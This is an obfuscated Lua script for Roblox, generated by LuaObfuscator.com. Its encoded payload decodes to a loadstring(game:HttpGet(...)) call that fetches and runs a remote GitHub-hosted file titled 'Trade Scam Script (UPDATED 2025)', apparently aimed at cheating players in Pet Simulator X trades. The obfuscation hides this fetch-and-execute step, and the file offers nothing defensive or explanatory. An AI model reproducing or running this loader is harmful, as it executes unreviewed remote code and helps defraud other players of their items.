--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v80,v19);v19=nil;v87=1;end end else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/(((1070 -(68 + 997)) -3)^(v32-(932 -(857 + 74)))))%((570 -(367 + 201))^(((v33-(928 -(214 + 713))) -(v32-(1 + 0))) + (2 -1))) ;return v81-(v81%(1 -0)) ;else local v82=(4 -2)^(v32-((2908 -(226 + 1044)) -(1523 + 114))) ;return (((v31%(v82 + v82))>=v82) and (620 -(555 + (278 -214)))) or (0 -0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v40 * ((22584888 + 8215228) -14022900)) + (v39 * (65886 -(87 + 263))) + (v38 * (436 -(67 + 113))) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1 + 0)) then v44=1 + 0 ;v45=(v20(v43,3 -2 ,972 -(802 + 150) ) * ((432 -(44 + 386))^(85 -53))) + v42 ;v41=3 -1 ;end if (v41==(2 + 0)) then v46=v20(v43,793 -(201 + 571) ,1028 -(915 + 82) );v47=((v20(v43,32)==((1427 -(630 + 793)) -3)) and  -1) or ((6 -4) -(4 -3)) ;v41=1 + 1 + 1 ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=(4090 -2902) -((2816 -(760 + 987)) + 118) ;end if (v41==(6 -3)) then if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=791 -(368 + 423) ;end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((886 -(261 + 624))/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-((3730 -(1789 + 124)) -794) ) * (v44 + (v45/((7 -5)^(494 -(416 + (792 -(745 + 21))))))) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;local v50={};for v64=3 -2 , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 1456 -(282 + 1174) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51~= #"<") then else local v85=(function() return 811 -(569 + 242) ;end)();while true do if (v85~=(5 -3)) then else v51=(function() return 1 + 1 ;end)();break;end if (v85==(0 -0)) then v56=(function() return v23();end)();v57=(function() return {};end)();v85=(function() return 1;end)();end if (v85~=(2 -1)) then else for v102= #"|",v56 do local v103=(function() return 1251 -(721 + 530) ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=1) then else v106=(function() return nil;end)();while true do if (v104~=0) then else local v113=(function() return 1271 -(945 + 326) ;end)();local v114=(function() return;end)();while true do if (v113==(285 -(134 + 151))) then v114=(function() return 0 + 0 ;end)();while true do if (v114==(1665 -(970 + 695))) then v105=(function() return v21();end)();v106=(function() return nil;end)();v114=(function() return 1;end)();end if (v114~=(1 -0)) then else v104=(function() return  #" ";end)();break;end end break;end end end if (v104== #"!") then if (v105== #":") then v106=(function() return v21()~=0 ;end)();elseif (v105==(1992 -(582 + 1408))) then v106=(function() return v24();end)();elseif (v105== #"xnx") then v106=(function() return v25();end)();end v57[v102]=(function() return v106;end)();break;end end break;end if (v103~=0) then else local v108=(function() return 0 -0 ;end)();while true do if (v108==(700 -(271 + 429))) then v104=(function() return 0 -0 ;end)();v105=(function() return nil;end)();v108=(function() return 1501 -(1408 + 92) ;end)();end if (v108~=1) then else v103=(function() return 3 -2 ;end)();break;end end end end end v55[ #"nil"]=(function() return v21();end)();v85=(function() return 2;end)();end end end if (v51==(1826 -(1195 + 629))) then for v89= #"]",v23() do local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90==(1 -0)) then while true do if ((1171 -(418 + 753))==v91) then v92=(function() return v21();end)();if (v20(v92, #"[", #"{")==(241 -(187 + 54))) then local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if ((781 -(162 + 618))==v109) then local v151=(function() return 0 + 0 ;end)();while true do if ((1 + 0)~=v151) then else v109=(function() return 2 + 0 ;end)();break;end if (v151~=(0 -0)) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==0) then local v165=(function() return 0 + 0 ;end)();local v166=(function() return;end)();while true do if (v165==(1636 -(1373 + 263))) then v166=(function() return 1000 -(451 + 549) ;end)();while true do if (v166==(0 + 0)) then v112[ #"asd"]=(function() return v22();end)();v112[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v110== #":") then v112[ #"91("]=(function() return v23();end)();elseif (v110==(2 -0)) then v112[ #"asd"]=(function() return v23() -((1324 -(1249 + 73))^16) ;end)();elseif (v110== #"19(") then local v171=(function() return 0 + 0 ;end)();local v172=(function() return;end)();while true do if (v171==(0 -0)) then v172=(function() return 1384 -(746 + 638) ;end)();while true do if ((0 + 0)==v172) then v112[ #"asd"]=(function() return v23() -(2^(23 -7)) ;end)();v112[ #".dev"]=(function() return v22();end)();break;end end break;end end end v151=(function() return 342 -(218 + 123) ;end)();end end end if (v109~=0) then else v110=(function() return v20(v92,5 -3 , #"19(");end)();v111=(function() return v20(v92, #"?id=",1587 -(1535 + 46) );end)();v109=(function() return 1;end)();end if (v109~=(2 + 0)) then else if (v20(v111, #"{", #"/")== #"}") then v112[1 + 1 ]=(function() return v57[v112[562 -(306 + 254) ]];end)();end if (v20(v111,2,1 + 1 )== #"|") then v112[ #"gha"]=(function() return v57[v112[ #"asd"]];end)();end v109=(function() return 8 -5 ;end)();end if (v109==3) then if (v20(v111, #"xnx", #"91(")~= #"[") then else v112[ #"0836"]=(function() return v57[v112[ #"http"]];end)();end v52[v89]=(function() return v112;end)();break;end end end break;end end break;end if (v90==(0 -0)) then local v107=(function() return 114 -(4 + 110) ;end)();while true do if ((1467 -(899 + 568))~=v107) then else v91=(function() return 0 + 0 ;end)();v92=(function() return nil;end)();v107=(function() return 1;end)();end if (v107==(585 -(57 + 527))) then v90=(function() return 1;end)();break;end end end end end for v93= #"}",v23() do v53[v93-#">" ]=(function() return v28();end)();end return v55;end if (v51==(0 -0)) then local v86=(function() return 0;end)();while true do if (v86==(604 -(268 + 335))) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v86=(function() return 2;end)();end if (v86==(572 -(426 + 146))) then v52=(function() return {};end)();v53=(function() return {};end)();v86=(function() return 1 + 0 ;end)();end if ((105 -(17 + 86))==v86) then v51=(function() return  #"[";end)();break;end end end end end local function v29(v58,v59,v60) local v61=v58[1 + 0 ];local v62=v58[(876 -(826 + 46)) -2 ];local v63=v58[(1024 -(697 + 321)) -3 ];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=2 -1 ;local v71= -(167 -(122 + 44));local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v83=1329 -(797 + 532) ,v74 do if ((v83>=v68) or (4177>4850)) then v72[v83-v68 ]=v73[v83 + 1 ];else v76[v83]=v73[v83 + (3 -2) + 0 ];end end local v77=(v74-v68) + 1 + 0 ;local v78;local v79;while true do local v84=0 -0 ;while true do if ((v84==(0 + 0)) or (400>1111)) then v78=v66[v70];v79=v78[1 + 0 ];v84=1 -0 ;end if ((3051>1005) and (v84==((3080 -1949) -(369 + 761)))) then if (v79<=(72 -(30 + 12 + 23))) then if ((3693<=4382) and (v79<=(3 + 0))) then if (v79<=1) then if (v79==((3155 -(260 + 1638)) -(1043 + 214))) then local v116=v78[7 -5 ];v76[v116]=v76[v116](v13(v76,v116 + 1 + 0 ,v71));else v76[v78[1214 -(323 + 889) ]]=v78[7 -4 ];end elseif (v79>(582 -(361 + 219))) then v76[v78[2 + 0 ]]();else local v120=320 -((493 -(382 + 58)) + 267) ;local v121;while true do if ((v120==(0 + 0)) or (3282>4100)) then v121=v78[2 + 0 ];v76[v121]=v76[v121](v13(v76,v121 + 1 ,v71));break;end end end elseif (v79<=(418 -((31 -16) + 398))) then if ((v79==((820 + 166) -(18 + 964))) or (3580<2844)) then v76[v78[7 -5 ]]=v60[v78[2 + 1 ]];else v76[v78[2 + 0 ]]=v78[3];end elseif (v79==(5 + (2 -1))) then local v126=850 -(20 + (1715 -885)) ;local v127;local v128;while true do if (v126==(1 + 0)) then v76[v127 + (2 -1) ]=v128;v76[v127]=v128[v78[130 -(116 + 10) ]];break;end if (v126==((0 + 0) -(0 -0))) then v127=v78[1 + (1 -0) ];v128=v76[v78[741 -((1747 -(902 + 303)) + 196) ]];v126=1 + 0 ;end end else do return;end end elseif (v79<=((61 -38) -12)) then if ((89<4490) and (v79<=(3 + 6))) then if ((v79==(5 + 3)) or (4983<1808)) then local v129=v78[(1 -0) + 1 ];local v130=v76[v78[7 -4 ]];v76[v129 + (2 -1) ]=v130;v76[v129]=v130[v78[4 + 0 ]];else v76[v78[478 -(41 + 435) ]]=v60[v78[(2781 -(322 + 905)) -(1126 + 425) ]];end elseif (v79==(415 -(118 + 287))) then v76[v78[7 -(616 -(602 + 9)) ]]={};else do return;end end elseif ((3829>3769) and (v79<=(1138 -(936 + 189)))) then if (v79>(1133 -(118 + (2415 -1412)))) then v76[v78[2]]={};else local v138=v78[5 -3 ];local v139,v140=v69(v76[v138](v13(v76,v138 + ((139 + 1475) -(1565 + 48)) ,v78[(2070 -(1121 + 569)) -(142 + 235) ])));v71=(v140 + v138) -(4 -3) ;local v141=0 + 0 ;for v146=v138,v71 do v141=v141 + (978 -(553 + 424)) ;v76[v146]=v139[v141];end end elseif (v79==((1215 -(449 + 740)) -12)) then local v142=v78[2 + 0 ];local v143,v144=v69(v76[v142](v13(v76,v142 + (2 -1) ,v78[(217 -(22 + 192)) + 0 ])));v71=(v144 + v142) -(1 + (683 -(483 + 200))) ;local v145=1092 -((2438 -(1404 + 59)) + 117) ;for v149=v142,v71 do local v150=0 + 0 ;while true do if (v150==0) then v145=v145 + 1 + 0 ;v76[v149]=v143[v145];break;end end end else v76[v78[6 -4 ]]();end v70=v70 + (2 -1) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574036F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C656E6F784150492F5053582D536372697074732F726566732F68656164732F6D61696E2F54726164652532305363616D2532305363726970742532302855504441544544253230323032352900094Q000D7Q001209000100013Q001209000200023Q002006000200020003001201000400044Q000E000200046Q00013Q00022Q00030001000100012Q000B3Q00017Q00",v9(),...);
